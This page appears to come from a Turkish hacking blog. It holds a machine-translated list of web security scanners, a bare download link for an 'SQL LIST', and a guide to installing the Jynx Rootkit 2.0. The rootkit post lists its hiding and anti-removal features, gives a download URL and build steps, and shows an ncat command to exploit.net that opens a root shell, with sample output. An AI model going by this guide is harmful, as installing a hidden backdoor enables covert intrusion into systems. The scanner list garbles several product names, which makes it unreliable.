22 Kasım 2015 Pazar

Web Application Security Scanner List

Ürün ve araçlar Aşağıdaki listede web uygulama güvenlik tarayıcısı işlevsellik sağlamak. Web uygulama güvenliği tarama işlevleri burada listelenir sağlayan herhangi bir araç - Bu listedeki araçlar Web Uygulama Güvenliği Konsorsiyumu tarafından onaylanmaktadır unutmayın. Eğer bu listeye eklenmesi gereken bir araç biliyorsanız,

GokBoruEfe İle İrtibata Geçiniz
Mail : GokBoruEfe@gmail.com  

Ticari Araçlar

  1. Acunetix WVS Acunetix tarafından
  2. AppScan IBM tarafından
  3. Suite Professional geğirmek PortSwigger tarafından
  4. Hailstorm Cenzic tarafından
  5. N-Stalker N-Stalker tarafından
  6. Nessus Tenable Network Security tarafından
  7. Netsparker Mavituna Security
  8. NeXpose Rapid7 için çalışan tarafından
  9. NTOSpider NTObjectives tarafından
  10. ParosPro MileSCAN Technologies tarafından
  11. Retina Web Security Scanner eEye Digital Security tarafından
  12. WebApp360 nCircle tarafından
  13. WebInspect HP tarafından
  14. Webking Parasoft tarafından
  15. Websecurify GNUCitizen tarafından


Software-as-a-Servis Sağlayıcılar

  1. AppScan OnDemand IBM tarafından
  2. ClickToSecure Cenzic tarafından
  3. QualysGuard Web Uygulama Tarama Qualys tarafından
  4. Sentinel WhiteHat tarafından
  5. Veracode Web Uygulama Güvenliği Veracode tarafından
  6. VUPEN Web Uygulama Güvenliği Tarayıcı VUPEN Security
  7. WebInspect HP tarafından
  8. WebScanService Elanize KG tarafından
  9.  

Özgür / Açık Kaynak Araçları

  1. Arachni Tasos Laskos tarafından
  2. Kapmak Romain Gaucher tarafından
  3. Grendel-Tarama David Byrne ve Eric DUPREY tarafından
  4. Paros Chinotec tarafından
  5. Andiparos
  6. Zed Saldırı Vekil
  7. Powerfuzzer Marcin Kozlowski tarafından
  8. SecurityQA Toolbar ISEC Partners
  9. Skipfish Michal Zalewski tarafından
  10. W3af Andres Riancho tarafından
  11. Wapiti Nicolas Surribas tarafından
  12. Izleyici Casaba Security
  13. WATOBO Siberas tarafından
  14. Websecurify GNUCitizen tarafından
  15. Zero Day Tarama

 NOT  : Linkler Zamanla Eklenecektir.

Web Uygulama Güvenliği Scanner Listesi

Ürün ve araçlar Aşağıdaki listede web uygulama güvenlik tarayıcısı işlevsellik sağlamak. Web uygulama güvenliği tarama işlevleri burada listelenir sağlayan herhangi bir araç - Bu listedeki araçlar Web Uygulama Güvenliği Konsorsiyumu tarafından onaylanmaktadır unutmayın. Eğer bu listeye eklenmesi gereken bir araç biliyorsanız,

GokBoruEfe İle İrtibata Geçiniz
Mail : GokBoruEfe@gmail.com  

Ticari Araçlar
Acunetix WVS Acunetix tarafından
AppScan IBM tarafından
Suite Professional geğirmek PortSwigger tarafından
Hailstorm Cenzic tarafından
N-Stalker N-Stalker tarafından
Nessus Tenable Network Security tarafından
Netsparker Mavituna Security
NeXpose Rapid7 için çalışan tarafından
NTOSpider NTObjectives tarafından
ParosPro MileSCAN Technologies tarafından
Retina Web Security Scanner eEye Digital Security tarafından
WebApp360 nCircle tarafından
WebInspect HP tarafından
Webking Parasoft tarafından
Websecurify GNUCitizen tarafından

Software-as-a-Servis Sağlayıcılar
AppScan OnDemand IBM tarafından
ClickToSecure Cenzic tarafından
QualysGuard Web Uygulama Tarama Qualys tarafından
Sentinel WhiteHat tarafından
Veracode Web Uygulama Güvenliği Veracode tarafından
VUPEN Web Uygulama Güvenliği Tarayıcı VUPEN Security
WebInspect HP tarafından
WebScanService Elanize KG tarafından

Özgür / Açık Kaynak Araçları
Arachni Tasos Laskos tarafından
Kapmak Romain Gaucher tarafından
Grendel-Tarama David Byrne ve Eric DUPREY tarafından
Paros Chinotec tarafından
Andiparos
Zed Saldırı Vekil
Powerfuzzer Marcin Kozlowski tarafından
SecurityQA Toolbar ISEC Partners
Skipfish Michal Zalewski tarafından
W3af Andres Riancho tarafından
Wapiti Nicolas Surribas tarafından
Izleyici Casaba Security
WATOBO Siberas tarafından
Websecurify GNUCitizen tarafından
Zero Day Tarama

26 Eylül 2015 Cumartesi

Teskilat-i Mahsusa - SQL LIST

Teskilat-i Mahsusa - SQL LIST
Teskilat-i Mahsusa - SQL LIST
Teskilat-i Mahsusa - SQL LIST

İndirme Link : http://www.4shared.com/file/SWI-FVWGba/Teskilat-i_Mahsusa_-_SQL_LIST.html

4 Mart 2013 Pazartesi

Jynx Rootkit/2.0 ( Kurulumu )


Bir Hackerın En Çok İstediği Şey kendini güvenlik açısından korumaktır bunun için proxy araçları ip gizleme araçları olsun kullananlar var ama en sağlamı Rootkit lerdir o yüzden sizlere bugün Jynx Rootkit/2.0 kurulumunu anlatmak istiyorum tabi buna da alıntı diyen olacak hadi neyse 

ilk baş özellikleri nelermiş ona bakalım 


Özellikler 


Netstat saklanıyorum

Proc ps / üst ve / Gizleme
Dosya gizleme
SSL connect () kanca kabul
Çok faktörlü kimlik doğrulama
Geliştirilmiş anti-kaldırma özellikleri
SUID ortam değişkeni ile Drop-kabuğu

Download : http://blackhatacademy.net/releases/jynx2.tgz


Kurulum :


# tar xzf jynx2.tgz # Bu Komut İle Dosyaları Çıkartıyoruz

# nano -w config.h # Bu Komut İle Dosyaları Yapılandırıyoruz ( Config Dosyası )
# make all # Bu Komut İle Derleme İşlemi Yapıyoruz 
# make install # Bu Komut İle Kurulumu Yapıyoruz

Kullanım :


Komut : sudo ncat exploit.net 80 -p 42 --ssl

Komuttan Sonra Root Şifresini İsticek Sizden Şifreyi Girdikten Sonra Rootkit Aktif Olacaktır ( Çalışacaktır )

Örnek : 


[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl

DEFAULT_PASS
Bump with shell.
>ls -lia 
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..